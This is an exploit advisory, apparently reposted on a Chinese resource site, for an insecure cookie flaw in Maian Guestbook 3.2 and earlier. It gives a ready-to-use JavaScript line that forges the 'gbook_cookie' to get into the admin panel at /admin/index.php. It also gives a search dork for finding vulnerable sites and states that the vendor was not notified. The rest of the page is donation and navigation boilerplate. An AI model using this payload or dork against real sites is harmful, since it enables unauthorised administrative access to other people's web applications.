Maian Guestbook

2023-12-04 0 673

-[*] ================================================================================ [*]-

-[*] Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

[*] Discovered By: S.W.A.T.

[*] E-Mail: svvateam[at]yahoo[dot]com

[*] Script Download: http://www.maianscriptworld.co.uk

[*] DORK: Powered by Maian Guestbook v3.2

[*] Vendor Has Not Been Notified!

[*] DESCRIPTION:

Maian Guestbook suffers from a insecure cookie, the admin panel only checks if the

cookie exists.

and not the content. so we can easyily craft a cookie and look like a admin.

[*] Vulnerability:

javascript:document.cookie = "gbook_cookie=1; path=/";

[*] NOTE/TIP:

after running the javascript, visit "/admin/index.php" to view admin area.

-[*] ================================================================================ [*]-

-[*] Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

悠久资源 Exploit Maian Guestbook https://www.u-9.cn/security/exploit/71871.html

Maian Guestbook
上一篇: Maian Recipe
Maian Guestbook
下一篇: Maian Weblog
常见问题

相关文章

发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务